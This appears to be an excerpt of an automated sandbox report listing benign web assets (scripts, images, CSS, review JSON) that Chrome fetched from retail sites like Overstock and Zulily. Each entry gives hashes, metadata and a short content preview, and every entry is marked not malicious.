                                                                                                                                                                                    File Type:ASCII text, with very long lines (5159), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5159
                                                                                                                                                                                    Entropy (8bit):5.390112905312816
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:D95qB/PY3HvqwW3sQ+xz2z0oD7x6J133SWV25g8E+YpJpVTPf+K/HtSD:h54/PY3vW3sFxz2L7xWS8JpdJvYD
                                                                                                                                                                                    MD5:1DE55612987B9C843049262E24338767
                                                                                                                                                                                    SHA1:9D6F0F615003C76A7157D2498EB94706A5DE0C87
                                                                                                                                                                                    SHA-256:EBA998D92039B2324B9610F815C5651319C0CC044AC3345595FB9209AD09E9BD
                                                                                                                                                                                    SHA-512:548ABA1D86EC80AD38A9B75343C9FF6C9D27836D6A8B1E5F33A45050971E678ED9B059665A9B811C0B615612F513D23BCE06B676DCDA678759AE7DAA9355BD08
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/onecall-tracking-client.eba998d92039b2324b9610f815c5651319c0cc044ac3345595fb9209ad09e9bd.js
                                                                                                                                                                                    Preview:!function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(t){var n=function(t,n){if("object"!==e(t)||null===t)return t;var o=t[Symbol.toPrimitive];if(void 0!==o){var r=o.call(t,n||"default");if("object"!==e(r))return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===n?String:Number)(t)}(t,"string");return"symbol"===e(n)?n:String(n)}function n(e,n,o){return(n=t(n))in e?Object.defineProperty(e,n,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[n]=o,e}var o,r=new Uint8Array(16);function i(){if(!o&&!(o="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto)))throw new Error("crypto.getRandomValues
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1594
                                                                                                                                                                                    Entropy (8bit):6.79760920879784
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:5TCIl/X2YlXWI2PUVoHdCkIudyxqmA5Ik07HB7hAgh+8Fm8tSaGgcvtIG:IIl/XflGdCId2PJD7B7GghVmexFIIG
                                                                                                                                                                                    MD5:F4618B26304AB364C412236CE33E7570
                                                                                                                                                                                    SHA1:946140A021428959BCA95C079671431229348950
                                                                                                                                                                                    SHA-256:0B2A460C6DFFDF81591074CC40A01E4560BB8209EA88ED2D4E2297C76C1B232D
                                                                                                                                                                                    SHA-512:730BA8B6CE94C0D55E20F7BF675932F5713544018791172313D268C14893EC50AC49F6D7624B77D57C0B735638715E074F33C365434EF11156374995604C2466
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_37aa2dc6-7baa-4f40-820d-5426b6ca7d2a.jpg?v=1729325319&width=80
                                                                                                                                                                                    Preview:RIFF2...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!.n.....Y.4e@.{.3=..xG].a.GS......].S.....v.].~s....S..<.......I.........2....0....T....8....^..,.i7C.nM..^....b.9vR.>6\........... ...V.[.......%s..]._...t,.i.w%.$]). .RZ.....V..-..".....o...wv..w*.......mm......6.^B.(.1.1....Z....c.!.E..)...U.....)q.....G..H.Lg.........s..G.E.JmB.5.aY........S.o...(...D!.....sO'F...H2S."..<..cM....}.:<b.[..+.RD.....%W.....b.39:..t... .....<.]>tE./z.3Z.(.s.....r..`v..Y..i..K..a..jK1..xV.h...y.|G..M..ep..C.u...[sGn..a....27-.:.Q....z*h...9.0..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, original size modulo 2^32 185031
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):48577
                                                                                                                                                                                    Entropy (8bit):7.994725460592687
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:GU1OIgf9Z5Sup6dmR6D/KUTcp5L5F6m+LTEYkgnNbp7SS4draXFCP3F:GU1wlZ5Su8dmY/T85LSEYk0V72aa3F
                                                                                                                                                                                    MD5:C0704F84D3BBD0782BAE3274EC71DF96
                                                                                                                                                                                    SHA1:90DFD9CA26FC0F9639843D0C8BE6FF5303680942
                                                                                                                                                                                    SHA-256:AE3E7AE382B51ECBF613535BF8551250A30A7664BBC33F1B1ACF57A3EC381538
                                                                                                                                                                                    SHA-512:7FF55C43D8D165F8F1ED4767DC985FD971281BC23D6170E9093B418C0180E45AF0234646B71CFB4456CE45DBD03A1B1003B79AA7527FAA313676D9FD961DBDBF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...........i{.F.0.........DQ..d..<.,.J...82'O.h..@.&H-.y~...^.X...d.{.;.."..^.....k.%m.b4.....9....77..<O.Y.&s>c.|.M.[+t..(w..6.o>.....7..f....Mlk?.f..d.>~.c;.X..G....C.^3*.y..6Kg..W.$[L.v6.oFy{.3.X.O#Y.#6..6.A.Z.6Os.......O9...[6...h..l6o.m{./....Ng....v...,..|>.E....l.V.....hO.k..=....k..7..<.w..UnG.?JlY.=.....eS>._._..,..WapS.l&... .$...e.q0.z......3.G..t..`.....b.p.S.....t..;l:M.l..J..V...kX".....~......d...'.......'.4..t...3......^.@&...p7.N.z8d..zb.s......4.;+.e~yOV.y2.pYa..z.m.. ..e..y@M=\. o.>..&.....]D.`...X..b...j...mnF..q...l.....x4...>b.y6... .......4.1Y....E..Z..-;!l..6...Yv..p...g3.....m.../.y[aF{...Y......c...".h.4Zc...+*.......Y..!O.py{.->.|..~`./...<67k]I@.....{z.#.Y.V^..-..........".. ....wg:...~.S..t..~..C&......G.2...Uc.i\..6.d.6.3,G...(%...C....K.0..>{............. ....\n..[.z2.,....o..X.I;D......../..!.H.IN1......5P;.w.G...D!._..?..k5.ocw......%..`D.C...D].z.^.l=..p.6....|.z......a..../.mC...APS...p......t.......Gp..z.6~..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):21
                                                                                                                                                                                    Entropy (8bit):4.011365041826379
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:JSPKArOw:UK2
                                                                                                                                                                                    MD5:9F04282C5B3ECCA33E725626F894BFD5
                                                                                                                                                                                    SHA1:99CA782476CB7BFD553803F5BE308B090B096E3B
                                                                                                                                                                                    SHA-256:D366CB845818CB63FBA9D91C87D085CE44B2E6D7339B8CF30ADED4FA4EFA7EE9
                                                                                                                                                                                    SHA-512:5FED53394233BAE105AFFCEA2E34D2018168329DB8DCA4D152AA7429E0216E07B785B5AEC9A0298164DAA840D2558B64F8D402385159028759FFD4591652F606
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:import "./embed.js";.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61494
                                                                                                                                                                                    Entropy (8bit):5.509250005125198
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIz:uYW2Pj5yO7t2ACRg8398vy
                                                                                                                                                                                    MD5:5F36A78AC6617F24097DB21A1DB94A63
                                                                                                                                                                                    SHA1:D670BEF2934D5A6E2DE1168BC5E40155E57DDBD6
                                                                                                                                                                                    SHA-256:638B4DB837CDF46E2A64B405EC81ABBF592DFF4D17EABDE70214E6332D03945A
                                                                                                                                                                                    SHA-512:21E25680534BE765BF6773C6B0E6C8B7941F2DABFA64353815AD9763629A2D030FAE0D6ABD23BFD7CCB6D1907FBB15C544D768377CC1D9742739571CFD9F6026
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/web-pixel-406552735@4fd0680eed907adaf3f85849c393d688/sandbox/worker.modern.js
                                                                                                                                                                                    Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 516x516, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4608
                                                                                                                                                                                    Entropy (8bit):7.963082608747992
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:PtmpiOvFUOrCzrb1YoMvUoG6EsJKNIq7MqnWqQW4OAY:adUO6r55PhQJDaLntb4OAY
                                                                                                                                                                                    MD5:9DCA7F1D2A03BE25A673F1CE09CAB786
                                                                                                                                                                                    SHA1:E062F58D8FC6EDF1430D1542200FFD1036280A86
                                                                                                                                                                                    SHA-256:8DD5503B56A53B2F7FFF4BD05D0D370E98626E172533C6F8C580E7F0F3ABCA94
                                                                                                                                                                                    SHA-512:9F4CA83B5D52A490EF9D84FE7AD84088493362E79401DDC771B745726BCEBA231AEA025C8CC5EFFC542D3272D1E45A97C6953467239618B2D1208A5764893476
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/08142024-MOPS-CategoryMod-coffeePot.jpg?imwidth=1920
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 ....p....*....?%..Y.*.....#.$.in.r!.xi.`.F.E>.........o.s..U...!.sx..V.;.o....e..0yZ..f.+R..7...jC...<.Hv\.3..(.......^..]6.&"...|..*....Tr...o.y....e.0..^q.....|..~..Z.*i]c....d...."...R....b0../.u..Hu..F.........>i`..`..U.6....v^..............{...3.Q..yZd...y...0W%.=..q..Z..t...V...i..n&.(.7;_{..x...,T........<d-...D9W..i...s......O.Z.4.f..}.._>.i.O8.sN..!!..O.i"1.\u..a....`:,..Qu..^...3t-.c.5?.[..gs2....#....U..Xh:._..b.^Z.....Kb....%.t........1....a.9OJ....x.A.6.+My>... ..J.9...w...J...6..fB.l.......Nx.u..@;(..7...F...Dq9Z.J8........f....g,..`:/..&...}$zP.2>.=.@zz..X&.9....;6i.e......vv.+R..7...`..D.......9...[.`-....\.H.U.=F..2o.}..<.....B....L_\..m$|.gC......I.....(....3Qh.r.3.P$..z....j!.p.b)..~..7....7wR.n%....8!.|%..A.i..g.....1....J...wP3.:.V.W.B..w......Z4...e.M......$-....Z..Vo.Zt..Yd....,%..,....n.(.m...6..k:.+P..,.?.UV...<U.y..j.t].(.....`.....@qWF..=... ...l..D...l.....r..c...,.=.f.40I...J.....;.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                    Entropy (8bit):4.686370289882632
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:t3JfDutQTNjSJKDiTqPuBl+iIoQOv+XGADewJMBtDAEAB1+cHb:3RTNWY+TKQyoQO22cHJsDAdX
                                                                                                                                                                                    MD5:4B749470E4CA393269CC20C139C554E5
                                                                                                                                                                                    SHA1:F5926C6F51C7248C600BABCCB76F2A98D9B95DD6
                                                                                                                                                                                    SHA-256:F11035ED318096E8A499831BE4CCAC73F01D215425F950336B79510E59395669
                                                                                                                                                                                    SHA-512:3EA82611C7BD3A436E309542D03F1D9A1850D34BBCE9B8CB425179A68B2CFDFB2D86FC0B139ED33B057A74A448165DC9DED564214BB1FADA969C7CECC7649CD2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/star-full.svg
                                                                                                                                                                                    Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_35_679)">.<path d="M6.78211 0.150521C6.86445 -0.0501734 7.13555 -0.0501738 7.21789 0.15052L9.02899 4.56477C9.06334 4.64848 9.13851 4.70581 9.22497 4.71423L13.7843 5.15808C13.9916 5.17826 14.0754 5.44889 13.919 5.59311L10.479 8.76512C10.4137 8.82527 10.385 8.91803 10.4041 9.00694L11.4109 13.6955C11.4566 13.9087 11.2373 14.0759 11.0583 13.9644L7.12112 11.5105C7.04646 11.464 6.95354 11.464 6.87887 11.5105L2.94171 13.9644C2.7627 14.0759 2.54338 13.9087 2.58915 13.6955L3.5959 9.00695C3.61499 8.91803 3.58628 8.82527 3.52104 8.76512L0.080984 5.59311C-0.0754184 5.44889 0.00835652 5.17826 0.215649 5.15808L4.77502 4.71423C4.86149 4.70581 4.93666 4.64848 4.97101 4.56477L6.78211 0.150521Z" fill="#2F3337"/>.</g>.<defs>.<clipPath id="clip0_35_679">.<rect width="14" height="14" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):19982
                                                                                                                                                                                    Entropy (8bit):7.965565168269484
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:cFIa5GHsbBvD0D/tvY3FtUaDh0xlRd+Kfz9gAoXw6tEeDtmXWQoCTrvJ/NzsTrLS:czogD0ztgEaSvbJsYe5yZrvVNGre
                                                                                                                                                                                    MD5:A72232C4C2C186E23EEDBA9BFC21134D
                                                                                                                                                                                    SHA1:898BA67594EE4698349574D9DE4294CA2B3E6D46
                                                                                                                                                                                    SHA-256:54B2B81744B235525D80DCFB2163DA866932ABB357ADFD49E3A9FABC1A3672A0
                                                                                                                                                                                    SHA-512:A12167EBAF3F7679B44614295CAA700F4C52FCC764494C8CE0853213F6068B0C2AFBE48213A3F81D491AF2C12AE4214D2DD1C4E4CCFBD7B59587767EBA984DA8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Ch_C3_A2teau-21.5_22-Right-Side-Faucet-Wall-Mount-Bathroom-Sink-with-Chrome-Towel-Bar.jpg?v=1710951880&width=320
                                                                                                                                                                                    Preview:RIFF.N..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 vK..P....*@.@.>9..D"!.l?....Z[....t.e_$..q...?@gL.. <..6.>....,..........A.K....x/...?......%.....#....3.2>..K.I...B...+....../...?.}.|.....C~...~........o...{..Y.G.k.?././.?.|....#.K.;..d.G..c/..Y(..........k.B&Z/.0......].{.,PNY2....CE..4..^...|.n....!....w.^.n......3..z.i9..........L. ......0{..;2k.. .......Wz|.)p{&.t.N...2,.D._.>..?.....{..^..\..@.U...........,n.@....3......O...{g.."Z..g..so.^AW......J$\:.......q3.,...S..]..5.+u..r.T.3<....k.rnCs..!_..O...tu.P......k+. .C.=.N....X........|R..*....... v...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (608)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):823
                                                                                                                                                                                    Entropy (8bit):5.079251934712805
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:e0vPioGlUrd033xLpxghnd0sH3xtpx2hnd0sQ3rpAhY:dvPioG+d7DDSDDjO
                                                                                                                                                                                    MD5:8972AE5004BC634FFA6641BE3960E78A
                                                                                                                                                                                    SHA1:235AECDFE4A45217D75FE7ABFBB5B12E3B28CC6E
                                                                                                                                                                                    SHA-256:7F264C31CDB355F351235359240C30ACAE2BBE0A43C73FA6A035123E6D953A01
                                                                                                                                                                                    SHA-512:F2CD81DC263916A1B47FDBCC58055BA4D3DB4C98FA9E9088776D695457B7BC974F3DFD217389A3E86FED0046313649D3626467AE63502967698406DDA4CFE3C5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v5-font-face.min.css?token=541968e6a0
                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"Font Awesome 5 Brands";font-display:block;font-weight:400;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:900;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:400;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype")}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.735747819786574
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfJeLifktZLaQkKLVb+mLww2qSLI2LAtmLjf47LIJQbCLKAVLV:YBULGktZLasLVbRLCLfLJL747LIJ8CLT
                                                                                                                                                                                    MD5:86EF79925E6257D174BAA5EBFA87B95E
                                                                                                                                                                                    SHA1:C009A847DF9BB796382301AD25BAA0BFB4DC81E0
                                                                                                                                                                                    SHA-256:A7263755826CD7DD0AB5CBA7CCC8CAF3C6AE7A84A8C44761B0938B83BCD5F894
                                                                                                                                                                                    SHA-512:91FDEC79AFA335765990A9DEBC8063EED3C0752DECBF21321BC36908A33B8D085DBFA975174148186EE4F18A6EA47C9B4D588DA3A0E0514D69B6CCEB2692CE7E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/26567245%2C34645678%2C34492291%2C34930030%2C35479173%2C8101775%2C20340282%2C31945954%2C34310807%2C40649229/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"34310807","rollup":{"average_rating":4.06,"rating_count":53,"review_count":53,"answered_questions":0}},{"page_id":"34492291","rollup":{"average_rating":4.73,"rating_count":41,"review_count":41,"answered_questions":0}},{"page_id":"34645678","rollup":{"average_rating":4.32,"rating_count":66,"review_count":66,"answered_questions":0}},{"page_id":"34930030","rollup":{"average_rating":4.59,"rating_count":71,"review_count":71,"answered_questions":0}},{"page_id":"35479173","rollup":{"average_rating":4.77,"rating_count":30,"review_count":30,"answered_questions":0}},{"page_id":"40649229","rollup":{"average_rating":4.24,"rating_count":50,"review_count":50,"answered_questions":0}},{"page_id":"8101775","rollup":{"average_rating":4.32,"rating_count":25,"review_count":25,"answered_questions":0}},{"page_id":"20340282","rollup":{"average_rating":4.55,"rating_count":467,"review_count":467,"answered_questions":0}},{"page_id":"26567245","rollup":{"average_rating":4
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):116513
                                                                                                                                                                                    Entropy (8bit):5.34426438977711
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:eJuyfE/+IV8rKrXLlciGW+G2VTKAdRlAmKMaV9nrl80/SvKcAxAMQLxC1QLWHuC6:+DsxX+G2VTKAVtvKjWMp1iWu
                                                                                                                                                                                    MD5:F74D2C1D7F7B2041E00F0347C7D2D5F8
                                                                                                                                                                                    SHA1:ABE7F23DFC882240C6641B061A84AFF68FDEAB5D
                                                                                                                                                                                    SHA-256:A3C053D11506F3F1EF0795F89739C8A0F99E4E2D50FC05205B4EC0A818A32C57
                                                                                                                                                                                    SHA-512:EB4D8E401D7EEA9F625A04D3B1DEFD7856A5EC31ECE9B67A806924EFB34D4B3FE879C0900905F16012A2903E2533A0D9BD4B153C87918623ABF219B9C66D7E00
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/s/trekkie.storefront.a8ef5c2c4f1c6e0839c6b8857d0a2edb7d22d961.min.js
                                                                                                                                                                                    Preview:!function(){var e={1644:function(e,t){"use strict";function n(e,t,n){try{var i;r({error:e,context:t,shopId:o()||(null===(i=window.Shopify)||void 0===i?void 0:i.shop),notes:n})}catch(e){}}function o(){try{const e=document.getElementById("shopify-features").textContent;return JSON.parse(e).shopId}catch(e){return null}}function r(e){const t=new XMLHttpRequest;t.open("POST","https://notify.bugsnag.com/",!0),t.setRequestHeader("Content-Type","application/json"),t.setRequestHeader("Bugsnag-Api-Key","95ba910bcec4542ef2a0b64cd7ca666c"),t.setRequestHeader("Bugsnag-Payload-Version","5");const n=function(e){const t=(n=e.error).stackTrace||n.stack||n.description||n.name;var n;const[o,r]=(t||"unknown error").split("\n")[0].split(":");return JSON.stringify({payloadVersion:5,notifier:{name:"ConsentTrackingAPI",version:"latest",url:"-"},events:[{exceptions:[{errorClass:(o||"").trim(),message:(r||"").trim(),stacktrace:[{file:"consent-tracking-api.js",lineNumber:"1",method:t}],type:"browserjs"}],context
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2455
                                                                                                                                                                                    Entropy (8bit):7.05118543881224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxdacO9X+etBg5bQjOp3uFb/HMJ91Fz:NBIl/Xrxd951uFbfMJ91Fz
                                                                                                                                                                                    MD5:16C65A23881D95FABB0414ABF5A43135
                                                                                                                                                                                    SHA1:6EE5C2A9C155CEC553F993C35B2BCEAFBB18F06B
                                                                                                                                                                                    SHA-256:A18298DAB59E22E623973C8243D7E04BFB109B60DD4ECEE5F8A4D5DD16214F53
                                                                                                                                                                                    SHA-512:16E5CAC5FD743770EAAD870093885EF35043935389F0B9385BFAC3DEEB18EC0DA550743CFB874192D297E27F39E07BC94316CCCB23F162BBF255286DCF771798
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................b9...N...G:..!.#....~.y..&.zo.7b.|G.EW.j.../~T..h........k>.4C/.*..$.p.e.vu.DQ...E.I...Ca.......'[.i.HHf.t..4Q...E........]Mn.&...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1142
                                                                                                                                                                                    Entropy (8bit):6.068287756619128
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:vTCIl/X2YlXWI2PUqIr/jWabcFPtMYKuhPlMz:OIl/XflEq/j8XMWhP+
                                                                                                                                                                                    MD5:EF2D9FADAFDBA69A4EA0B8A99729B417
                                                                                                                                                                                    SHA1:572D98325BD88AE98717A1203AF2A485BAC38E97
                                                                                                                                                                                    SHA-256:C2834539FCC27BE2C0972F1371B7BCA78367FA13EB315E239F6DC5E89F670D73
                                                                                                                                                                                    SHA-512:3631DD3E421C6B1CAD893C792FCB7828907F339613CAAF279356084A13D7BF48EA65002CEB82D77884DA6AF8C1570259CA1605192CDC0744AAD87162CFBE5163
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_61c3e526-6c29-4a1a-a735-92b6c701f5e5.jpg?v=1729325190&width=80
                                                                                                                                                                                    Preview:RIFFn...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C"!!...@ ....i...l~.;...!...]h..X.4..z5..."...%...B..G...}>.m.@.^..tG'..tsvX.I..f...........nJ......A..t..7..w...x|.s....Z7.y:......H...|...TR.. .u`...O.b/]'..ay.oA..\m...p..;...}?....x.e. ]..2N..Al%.`..T.M.n.m......m..$. eOp.j..<&:.Q7...J.....^..I..I..J.hN.C.....7h.t4......n...h6.,..4.ZA..$-.^.].....lE..........m..H.R.B..+.."...........7]A+..l...#.+....r..YhWY....."..*6.X.}.)..Vr2.O...cQ|b.I.V....1.R......../]...?.$.?.RbO.-...|].Y..".....EXIF....Exif..II*...........................V.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3731
                                                                                                                                                                                    Entropy (8bit):7.471172756617193
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NBIl/XrxkLQzA7RJ7GdkXY4rtksNeDVaSVBIl8OcP3i9FhCFYFre:N2PzA1J71XY4rGsNe5aSVKPs3yFhCMe
                                                                                                                                                                                    MD5:34219166FA6EE8DEC84A084C4B9EC5B6
                                                                                                                                                                                    SHA1:2E2B03F79B9A03E2B456294570FA6B3D5F3AAECF
                                                                                                                                                                                    SHA-256:645AB230EFDFC01BF678891FB7741D3D99D5D9ECC741DB8BEB5143B9A0575644
